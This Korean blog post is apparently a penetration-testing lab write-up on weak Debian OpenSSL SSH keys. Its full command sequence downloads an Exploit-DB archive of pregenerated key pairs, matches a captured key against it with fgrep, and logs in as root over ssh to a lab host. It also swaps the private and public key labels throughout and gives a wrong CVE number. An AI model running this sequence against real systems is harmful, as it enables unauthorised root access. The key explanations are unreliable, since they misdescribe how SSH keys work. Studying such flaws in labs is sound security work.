Study Record

[모의해킹 실습] Root SSH Key Crack(CVE 2008-0116) 본문

모의해킹

[모의해킹 실습] Root SSH Key Crack(CVE 2008-0116)

초코초코초코 2021. 11. 11. 01:23
728x90

1. 개요

Debian 기반의 OS에 OpenSSL 0.9.8c-1 버전부터 0.9.8g-9 이전 버전까지는 예측가능한 숫자를 가지고 생성하여 사용한다. 이런경우에는 쉽게 무작위 추측 공격을 통해 암호화 키에 대한 원격 공격이 가능하다. 

무작위 공격을 위해 공격 가능성이 높은 ssh private/public 키 쌍의 묶음 파일을 다운로드하여 공격한다. 

 

2. 실습

☞ ssh private/public 키 쌍의 묶음 파일을 다운로드

공격 가능성이 높은 ssh private/public 키 쌍의 묶음 파일을 다운로드한다.

# wget --no-check-certificate \

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

# tar xvjf 5622.tar.bz2

압축을 해제한 결과 $(pwd)/rsa/2048 폴더에 private keypublic key 쌍에 대한 정보가 들어갔다.

private key 를 가지고 public key 얻기

→ private key

 AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0SjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

 

㉮ private key 를 sshkey.txt 에 저장한다.

# vi /root/test/sshkey.txt

AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0SjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

 

㉯ sshkey.txt 파일과 미리 준비된 ssh key 쌍들을 비교하여 public key를 찾는다.

# cd /root/test/rsa/2048

# fgrep `cat /root/test/sshkey.txt` *.pub

결과의 "57c3115d77c56390332dc5c49978627a-5429" 가 public key 이다.

 

㉰ 얻은 public key를 가지고 root 계정으로 로그인할 수 있다.

# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.10.141

 

728x90